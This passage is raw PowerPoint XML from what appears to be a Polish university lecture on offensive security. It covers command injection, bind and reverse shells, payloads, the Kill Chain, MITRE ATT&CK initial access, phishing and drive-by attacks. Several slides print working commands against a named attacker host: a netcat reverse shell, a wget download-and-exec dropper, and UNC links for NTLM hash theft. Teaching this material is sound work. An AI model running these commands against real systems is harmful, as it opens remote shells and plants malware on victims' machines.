            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> OS command injection)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cała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komunikacja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odbywa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się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poprzez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protokół</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> HTTP (TCP)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przykładowy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zbiór</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>shelli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dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/danielmiessler/SecLists/tree/master/Web-Shells/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798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1771"/>
            <a:ext cx="11377246" cy="616302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Bind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529870" y="537591"/>
            <a:ext cx="11495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>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Kontrolowany przez atakującego system oczekuje na połączenie przychodzące od atakującego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pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Połączenie odbywa się (najczęściej) z wykorzystaniem protokołu TCP, cel nasłuchuje na wybranym porcie (np. 4444 - wybór portu zależy od kilku czynników - przede wszystkim od ograniczeń wynikających z polityk firewalli oraz już otwartych portów nasłuchujących na hoście, w praktyce jest to najczęściej port 443)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13E9-37AC-49FD-A76D-5F1E9409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24" y="1984141"/>
            <a:ext cx="9397165" cy="4701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88959-9D94-4110-A4F4-5902D39A8615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1728594" y="6320409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3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=wXkN6WGvadM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335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3" y="11771"/>
            <a:ext cx="11377246" cy="616302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Bind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5DFC7-90A5-41A8-9E7B-98714DCF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7" y="1431636"/>
            <a:ext cx="10785179" cy="4858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C1618-8F7A-4E48-8F15-954DEFC26AD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932296" y="701964"/>
            <a:ext cx="1014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Wynik komendy nmap (port scan) pokazujący 3 porty TCP otwarte w trybie nasłuchu - serwera, gotowe na przyjęcie nowych połączeń - klientów;	25, 80, 111:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360114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91" y="0"/>
            <a:ext cx="11377246" cy="53633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Remote Shell - reverse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E570-B5BF-471B-AFA9-859B290780B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454324" y="536331"/>
            <a:ext cx="11283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>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Kontrolowany przez atakującego system nawiązuje połączenie z systemem atakującego,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> oczekuje komend, wykonuje je i odsyła ich rezultaty</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" u="sng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Połączenie odbywa się (najczęściej) z wykorzystaniem protokołu TCP (tutaj przykład z użyciem ICMP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/ewilded/icmpsh-s-linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>)</a:t>
            </a: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W praktyce najczęściej używany rodzaj shella (z powodu NAT i polityk firewalli)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FC0A1-37F5-4518-800C-672155B0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4" y="2294279"/>
            <a:ext cx="9090430" cy="429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C6E0D-55D8-46B8-882C-527A8A8F64F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1702347" y="6320409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4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=wXkN6WGvadM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493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Poniżej rozpoczęcie nasłuchiwania na 46.101.187.48, TCP, port 4444 (narzędzie użyte tutaj do nasłuchu na porcie 4444, wysyłania i odbierania komend to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):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A picture containing indoor, computer, sitting, computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ECE73A4-3E4A-4E33-B6BF-A8954DE9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848659"/>
            <a:ext cx="9402758" cy="37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7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Rolę narzędzia dostarczającego funkcję reverse shella na komputerze ofiary również pełni tutaj narzędzie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 (tę samą funkcjonalność można uzyskać mnóstwem innych rozwiązań, np. programem napisanym C/C++, skrypcie w Pythonie, PHP, programie w Javie itd.):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E0209-5B64-4D78-8E21-00677781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38" y="3229965"/>
            <a:ext cx="6688405" cy="35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4" y="0"/>
            <a:ext cx="11377246" cy="68148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Reverse shell w akcji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517585" y="681487"/>
            <a:ext cx="11283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Serwer atakującego: hackingiscool.pl (46.101.187.48)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Port, na którym atakujący oczekuje połączenia z reverse shella: 4444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Cel (ofiara), na którym dochodzi do złośliwego Code Execution: example.org (użytkownik www-data)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Rolę narzędzia dostarczającego funkcję reverse shella pełni tutaj narzędzie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="220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994E9B8-F5E4-4E25-BE17-67A47F06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8" y="2606603"/>
            <a:ext cx="7545701" cy="40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78872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HACKING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07076" y="721356"/>
            <a:ext cx="11446625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Technologia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Zamiłowanie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Rozumienie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Rozwijanie, ulepszanie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Znajdowanie problemów i rozwiązań, odkrywanie nowych zastosowań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Bez hackingu nie istniałoby bezpieczeństwo ofensywne (ani defensywne)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Nauka i sztuka (ang. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1"/>
              <a:t>science and art</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="280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Filozofia (podejście do życia, lifehacking ;))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Podobnie jak nauka i technika, hacking jest zjawiskiem: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użytecznym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moralnie agnostycznym</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172023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319178"/>
            <a:ext cx="11377246" cy="131984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Exploitacja OS command injection - reverse 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639019"/>
            <a:ext cx="11283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Komenda wykonana na zdalnym systemie w tym przypadku inicjuje połączenie zwrotne z wykorzystaniem basha i netcata (reverse shell):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nc -e /bin/bash 46.101.187.48 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="220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D228B3-E485-42A6-A9F6-9EDDF47B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" y="2541166"/>
            <a:ext cx="6393734" cy="2385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93CE0-8A46-4BF9-A91B-90CFFBB0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85" y="3384391"/>
            <a:ext cx="8082615" cy="2650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468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319178"/>
            <a:ext cx="11377246" cy="131984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Exploitacja OS command injection - download &amp; exec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639019"/>
            <a:ext cx="11283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Komenda wykonana na zdalnym systemie w tym przypadku pobiera dodatkowy program/skrypt ze zdalnego serwera (np. kod bardziej zaawansowanego reverse shella/RAT-a z funkcjonalnością reverse shella) i wykonuje go (tzw. download &amp; exec):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wget https://hackingiscool.pl/update.sh -O /tmp/update.sh; chmod +x /tmp/update.sh; /tmp/update.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highligh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3AB07-E280-44F1-BE0A-7D02FE57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9" y="3085569"/>
            <a:ext cx="8710694" cy="27909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909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9" y="138024"/>
            <a:ext cx="11377246" cy="1052422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Eksploitacja RCE - payload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F1FAE-7027-4B38-90AC-20E78F6677C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454324" y="1457864"/>
            <a:ext cx="112833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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Obydwa pokazane wcześniej przykłady komend użytych przy eksploitacji, tj.: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nc -e /bin/bash hackingiscool.pl 4444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highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>wget https://hackingiscool.pl/update.sh -O /tmp/update.sh; chmod +x /tmp/update.sh; /tmp/update.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>w kontekście eksploitacji określa się jako </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1"/>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>(z ang. "ładunek").</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" i="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="22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Payload wykonujący czynność </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1"/>
              <a:t>download &amp; exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>często określa się terminem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1"/>
              <a:t>dropper/first stage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>, służy on dostarczeniu do atakowanego systemu właściwego złośliwego programu.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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Program pobrany i wykonany w wyniku </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1"/>
              <a:t>download &amp; exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>to tzw. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1"/>
              <a:t>second stage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t> (najczęściej jakaś forma RAT z funkcją reverse shella).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Zarówno payload jak i second stage zaliczamy do malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>Stosowane payloady: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download &amp; exec (najczęściej),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dodanie nowego użytkownika,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odczyt konkretnego pliku (np. z hasłem/wrażliwą konfiguracją/bazą danych),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inna pojedyncza komenda.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151574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Cyber Kill Chain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40137-7441-4999-B88D-EAEFFFB9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1502278"/>
            <a:ext cx="4239492" cy="5050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5E709-4882-4E7C-8E70-BF4EFA2A57D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6296025" y="655320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lockheedmartin.com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7DDE-D0CD-475A-B87A-472DE6759798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504825" y="1676400"/>
            <a:ext cx="52396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Cyber Kill Chain - zaproponowany przez LockheedMartin schemat (framework) obrazujący możliwe etapy profesjonalnie przeprowadzonych wtargnięć do systemów komputerowych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Termin "kill chain" wywodzi się z wojskowości, odzwierciedla struturę ataku na dany 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Siłą rzeczy, kill chain strukturyzuje również perspektywę defensywną</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2946950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ATT&amp;CK MATRIX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40BA2-D079-4FCD-B88C-DBD7A78FE921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955964" y="2715491"/>
            <a:ext cx="102800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baza wiedzy o ofensywnych taktykach i technikach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publicznie dostępna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aktywnie rozwijana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ustrukturyzowana w oparciu o Cyber Kill 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podstawa budowania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metodologii bezpieczeństwa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/>
              <a:t>modeli zagrożeń (ang. Threat Models)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>	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9501-3F1F-4CC8-AEC0-F31217DB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467716"/>
            <a:ext cx="54483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6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ATT&amp;CK MATRIX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484E3-BFDC-4D10-BC4F-722E38F6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73" y="1562677"/>
            <a:ext cx="10179901" cy="4762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446691" y="6409796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://attack.mitre.org/resources/enterprise-introduction/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9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Perspektywa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i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myślenie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sz="4175" b="1" spc="254" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ofensywne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4175" b="1" spc="254" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> - PRE ATT&amp;CK</a:t>
            </a:r>
            <a:endParaRPr sz="4175" b="1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https://attack.mitre.org/tactics/pre/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D357A-C74E-4877-8315-7F0D278C95ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010653" y="1704109"/>
            <a:ext cx="96379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Zbieranie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>informacji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t> (information gathering)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Jednostki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>biznesowe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Ludzie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Używane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>technologie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Stosowane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>praktyki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Infrastruktura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Identyfikacja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>słabości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Selekcja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>celów</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t> (path of least resistance)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Przygotowanie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przetestowanie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1"/>
              <a:t>ataku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4853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Perspektywa i myślenie ofensywne - PRE ATT&amp;CK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https://attack.mitre.org/tactics/pre/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D909-E98B-4A4A-B03A-726F0582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21" y="1363839"/>
            <a:ext cx="11002484" cy="49024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757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ATT&amp;CK for Enterprise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.org/matrices/enterprise/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34FC6-1A9D-4D1C-B444-53A486F3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9" y="1055594"/>
            <a:ext cx="10715047" cy="50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794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921546"/>
            <a:ext cx="11148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Wstępny dostęp, określany też często jako </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" i="1"/>
              <a:t>foothold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Obligatoryjny, niezbędny etap każdego udanego wtargnięcia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Zazwyczaj najtrudniejszy w uzyskaniu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Zazwyczaj jest to dostęp na poziomie możliwości wykonania dowolnego kodu (RCE) w którymś z systemów należących do celu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Uzyskanie wstępnego dostępu otwiera cały szereg nowych możliwości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informacji o zwyczajach, konfiguracjach, politykach, używanym oprogramowaniu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informacji o użytkownikach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dostęp do haseł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nowy wektor ataku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75475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78872"/>
            <a:ext cx="9432360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HACKING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489492" y="1073048"/>
            <a:ext cx="11446625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Tzw. "etyczny hacking" jest w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng"/>
              <a:t>mojej personalnej opinii </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>niewłaściwym sformułowaniem (wobec tego go nie używam) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL"/>
              <a:t>😃</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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Fraza ta narzuca założenie, że hacking sam w sobie jest czymś niemoralnym/nieetycznym/przestępczym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Spłyca całe pojęcie do zwykłego włamywania się do systemów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Nie spotyka się określeń jak np. "etyczna inżynieria", "etyczna medycyna", "etyczne strzelectwo" itd.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W </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng"/>
              <a:t>mojej personalnej ocenie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> termin ten jest używany na pokaz (ang. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1"/>
              <a:t>virtue signaling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> - zdobywanie aprobaty i akceptacji społecznej w wyniku afiszowania się swoją rzekomo słuszną i moralnie właściwą postawą)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Co więcej, prawdziwy świat nie zawsze jest taki prosty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1338259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21427" y="1378746"/>
            <a:ext cx="1114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Techniki MITRE:</a:t>
            </a:r>
          </a:p>
          <a:p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Drive-by Compromise				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1189/ 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Exploit Public-Facing Application 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1190/ 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External Remote Services			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1133/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Hardware Additions				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1200/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Phishing					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1566/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Replication Through Removable Media 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1091/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Supply Chain Compromise			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1195/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Trusted Relationship				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1199/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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Valid Accounts				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/techniques/T1078/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100"/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37388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Exploit Public Facing Application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2198256"/>
            <a:ext cx="1114829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/>
              <a:t>Zaatakowanie aplikacji dostępnej przez Internet, zazwyczaj poprzez podatność prowadzącą do RCE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publicznie dostępny exploit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niedostępny publicznie exploit na publicznie znaną podatność (CVE)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niedostępny publicznie exploit na nieznaną publicznie podatność (0day)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99587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External Remote Services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801441"/>
            <a:ext cx="111482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/>
              <a:t>Zaatakowanie dostępnych przez Internet usług dostępu zdalnego, np.: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VPN (Virtual Private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Usługi pulpitu zdalnego,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VNC (Virtual Network Computing)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RDP (Remote Desktop Protocol)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Citrix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SSH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Windows Remoting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2300"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2300"/>
              <a:t>Ataki mogą się odbyć z wykorzystaniem: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exploitów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prawidłowych kont użytkowników (Valid accounts)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288094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Hardware Additions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699617" y="1297647"/>
            <a:ext cx="111482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Fizyczne umieszczanie w docelowej infrastructurze (sieci, budynku, otoczeniu) dedykowanego sprzętu umożliwiającego atakującemu jakąś formę dostępu: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podsłuch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kamera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przechwytywanie ruchu sieciowego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aktywny dostęp do sieci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wstrzykiwanie sekwencji klawiszy w sposób nierozróżnialny od tego, gdyby pochodziły z fizycznej klawiatury - interfejs HID (Rubber Ducky, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Bash Bunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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Wektor ataku często wykorzystywany przez testerów penetracyjnych (Pentest/Red Team)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1336909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Phishing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050942"/>
            <a:ext cx="111482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Phishing to komunikacja (najczęściej pisana, ale może być też głosowa) podszywająca się pod podmiot zaufany dla ofiary (używająca zatem elementu socjotechniki - ang. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1"/>
              <a:t>social engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>Najczęściej wykorzystywaną formą jest e-mail.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>Inne formy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SMS (SMSishing)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Telefon (Vishing)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Wiadomości prywatne na komunikatorach i portalach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/>
              <a:t>Listy/pisma w formie papierowej</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251237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Phishing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05080" y="797510"/>
            <a:ext cx="11148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Wyróżniamy trzy podstawowe cele ataków phishingowych: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Dostarczenie malware na komputer ofiary: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zainfekowane załączniki - najpopularniejsze są pliki pakietu office z osadzonymi złośliwymi makrami VBA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RCE exploit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Przekonanie ofiary do wyjawienia swojego hasła (lub innych danych poświadczających tożsamość)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fałszywe strony logowania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wbudowane linki UNC (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1"/>
              <a:t>\\attacker.com\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>) mające na celu wykradnięcie hasha NTLM (Windows) celem złamania hasła atakiem słownikowym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Zdobycie informacji potrzebnych do zaplanowania/przygotowania innych ataków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autoresponder/odpowiedź zawierająca stopkę (format, styl, ewentualne miejsce umieszczenia logo firmy)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ustalenie, jakiego klienta poczty lub jakiej przeglądarki używa ofiara</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3230940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Phishing a inżynieria socjalna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787827" y="1013170"/>
            <a:ext cx="11148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Zdarza się również, że właściwy atak phishingowy poprzedzony jest wymianą naturalnie wyglądającej komunikacji z ofiarą, co ma na celu uśpić jej czujność i zbudować zaufanie (inżynieria socjalna)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Pamiętajmy, mogą to być maile, może to być komunikator/serwis społecznościowy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Ekstremalnym przypadkiem jest długotrwałe budowanie relacji celem zdobycia zaufania (scenariusze zakrawające na metody szpiegów i psychopatów)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Innym bardzo skutecznym sposobem ataku jest podszywanie się pod zaufany podmiot poprzez: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spoofing (sfałszowanie adresu źródłowego email / numeru źródłowego wiadomości SMS (CallerID spoofing))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włamanie się na konto danego podmiotu zaufanego i posłużenie się nim do zaatakowania innych podmiotów, które mu ufają (dobrym przykładem jest BEC - Business Email Compromise)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1953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Drive By Compromise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933570" y="1197592"/>
            <a:ext cx="111482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Nazywany również "watering hole" oraz "strategic web compromise"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Wektorem ataku są strony www regularnie i naturalnie odwiedzane przez użytkowników (np. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://po.edu.pl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>, jeśli celem są pracownicy/studenci Politechniki Opolskiej)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Strony te stają się wektorem ataku w wyniku złośliwej ingerencji w nie przez atakującego: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włamanie do panelu administracyjego strony/na serwer hostujący stronę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wykupienie reklam na danej stronie i osadzenie w nich złośliwego kodu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wykorzystanie istniejącej funkcjonalności/podatności w aplikacji webowej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/>
              <a:t>Przeglądarka atakowana jest poprzez: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/>
              <a:t>exploity wykorzystujące podatność w samej przeglądarce (przede wszystkim RCE, ale również np. kradzież pliku czy automatyczne zażądanie linku UNC (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1"/>
              <a:t>\\attacker.com\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
